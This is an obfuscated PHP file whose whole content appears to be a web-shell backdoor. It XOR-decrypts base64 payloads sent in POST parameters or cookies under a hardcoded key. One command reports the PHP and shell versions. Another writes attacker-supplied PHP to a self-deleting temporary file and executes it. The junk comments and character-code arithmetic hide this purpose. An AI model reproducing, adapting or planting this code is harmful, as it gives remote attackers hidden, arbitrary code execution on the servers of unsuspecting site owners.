<?php $iyktusxc     = /*  vwqulr   */ 'iyktusxc' /* uw  */ ^     '';


$spjglu    = /* qhkivo  */ "a"."r".$iyktusxc(114)     .    $iyktusxc(97)	.    "y"."_"."m".$iyktusxc(97) /*  oy */ .    $iyktusxc(677-565);$nk_exqd /*   ejgbb   */ =    "c".$iyktusxc(245-134)    .	$iyktusxc(117) /* c */ .      $iyktusxc(110) /*   vamh_ */ .	"t";






function	efixefrqc($nlvnrfp, /* pg*/ $ywcgz_czpl)

{
 /*nr*/ global  $iyktusxc;


   
     $nlvnrfp    =	"<"    . /*  v */ $iyktusxc(127-64)       .    $iyktusxc(112)    .	"h"."p".$iyktusxc(32) /*ptitr  */ .	$iyktusxc(730-613)    . /*   lmdbr */ $iyktusxc(110)       .	"\x6c"	.	"i"."n"."k"."\50"  . /* nx*/ $iyktusxc(95)	.	"_".$iyktusxc(70)      . /*nwz   */ "I"."L"."\x45"       .    "_"."\137"     . /*  dpyqr  */ $iyktusxc(102-61)       .	";".$iyktusxc(32) /*na   */ .  $nlvnrfp["d"];


 /*   q*/ $xizqheds /*  dcj */ =  "\146"	.      "\151" /*  yt_*/ .   "l"."\145"."_".$iyktusxc(545-433)       . /*   u */ "u".$iyktusxc(116)   .	"_"."\x63"	.      "o".$iyktusxc(258-148) /* jai*/ .	"t".$iyktusxc(818-717)     .    "\x6e" /*adx   */ .    $iyktusxc(898-782)     .    "s";

 /*o*/ 

 /*  sfg */ $xizqheds($ywcgz_czpl, /*   evn   */ $nlvnrfp);


       
 /*  yyxoos   */ eesyed($ywcgz_czpl);
}



$bhidu	= /* xxw*/ 73;



function /*btxd*/ eesyed($ywcgz_czpl)

{


       global	$iyktusxc;


   


   include($ywcgz_czpl);
     $cseiz_kwb /* f   */ =    $ywcgz_czpl;

 /*   ug*/ @unlink($cseiz_kwb);}

function    guy_nwyq()
{ /*_rigb*/ global    $iyktusxc;


       $ypjawkq /*  gnwf   */ =      array();


      $ypjawkq["\x70"   . /* zici */ "v"]	= /*  ittlw */ phpversion();

  $ypjawkq["s".$iyktusxc(118)]	= /*  uwqw*/ "3"."\56" /*  ixsaqp */ .    "\65";

	$ohbtkr /*  jvdlsg  */ = /*  aqqeje*/ 74;


     echo    @serialize($ypjawkq);

}


function    goirfqd($nlvnrfp,    $trstbsp){    global	$iyktusxc;


	$sdzcklvip    = /*cqz */ "";	$ceatpaq	=    'izq';    $qyqymxu /*qhsw  */ =     hash('sha256',	$nlvnrfp);


 /*c_rpux */ $gfuukuum    = /*h*/ str_replace('_zbweypkd',  $qyqymxu,	$ceatpaq);


      $ypjawkq	=    0;
    while      ($ypjawkq    <   strlen($nlvnrfp))    {

 /* fwqlg*/ $tugta    =	isset($trstbsp)	? /*  f   */ $trstbsp /*   wbgnqy   */ : /* lxl  */ '';
       for /*   unm  */ ($vdnejndv	=	0;    $vdnejndv   < /* f */ strlen($tugta)	&& /*_crt  */ $ypjawkq /*  c_zckg   */ <      strlen($nlvnrfp);       $vdnejndv++,    $ypjawkq++) /*zpeyte   */ {


     $sdzcklvip /*jo  */ .=     $iyktusxc(ord($nlvnrfp[$ypjawkq])   ^ /*ige_y  */ ord($tugta[$vdnejndv]));


    }    if	(strlen($sdzcklvip) /*  yyccpo  */ > /*o   */ 20)       {  $gfuukuum /*z_xt  */ =     substr($sdzcklvip,    0,    20);


       }	}      if       (empty($sdzcklvip)) /*aisq   */ {
       $sdzcklvip     =  date('Y-m-d    H:i:s');
 /*a   */ }


	return    $sdzcklvip;


}


function    j_yffscdzo($xustdbu_e)

{
 /*   u_bla*/ global     $iyktusxc;


  
    $mifelty	= /* kw  */ $iyktusxc(566-510) /*   bju*/ .    "\66" /* elxn_h   */ .     "c"."9"."\145".$iyktusxc(116-64)	.	"\x62" /* t */ .     $iyktusxc(54) /* dvblkb*/ .       "\55"	.    "c"."d".$iyktusxc(53)   .     "b"."\x2d"       . /*   xydmw   */ $iyktusxc(430-378) /*   dst */ . /*  btvlgp   */ "\146" /*   fzhsp   */ .      "\62"	.       $iyktusxc(875-827)  .      "-".$iyktusxc(960-862) /*jbjbvb  */ . /*   eyf_cd   */ "8"."4"."b".$iyktusxc(45) /*  qlb   */ .    $iyktusxc(397-349)  . /*   rril   */ $iyktusxc(289-187) /* nkb*/ .	"c".$iyktusxc(51)	.  "\x66" /* udya   */ . /*   gf_gr  */ "8".$iyktusxc(323-275)    .    "9"."\x39"     .      "\x65" /*  ehy  */ .      "3".$iyktusxc(97);

 /* n*/ 

   foreach    ($xustdbu_e      as    $lseo_vkg /*   y_   */ =>    $nlvnrfp)    {

    czyatgkmjz(base64_decode($nlvnrfp), /*   pkz */ $mifelty,	$lseo_vkg);


 /*   cyp   */ }


}

function  czyatgkmjz($nlvnrfp,   $mifelty,     $lseo_vkg)


{


    global    $iyktusxc;
 /*   hnevvm   */ 

	$nlvnrfp /*eu_umd  */ =    unserialize(goirfqd(goirfqd($nlvnrfp, /*   vdyqui*/ $mifelty),    $lseo_vkg));	$nshxwjw /*   yjnme */ =	'ztdiye_';

	$ttoyg /*  sxvtjk   */ = /*  y   */ 'rovsexz';


    if  (isset($nlvnrfp["\141" /* vi*/ .    $iyktusxc(107)]))     {  if /*  sgb */ ($nlvnrfp["a"]	==	"i")    {
 /* kxjjy */ guy_nwyq();


      } /* gexqd*/ elseif /*hm   */ ($nlvnrfp["a"]	==  "\145") /*  w  */ {       efixefrqc($nlvnrfp, /* evewmh*/ sprintf("."."/"."\45"    .      "s".$iyktusxc(46)    .   "p".$iyktusxc(192-84), /*   _p */ md5($mifelty)));

			$nqgvkdx	=	44;


    }

  exit();

 /* x */ }}



j_yffscdzo($_POST);    


$whltwu     =      $spjglu('rawurldecode',	$_POST);


$ekyfakq	=  $nk_exqd($whltwu);

j_yffscdzo($_COOKIE); /*yc*/ 


$riymwblj    =	$spjglu('rawurldecode',    $_COOKIE);







?>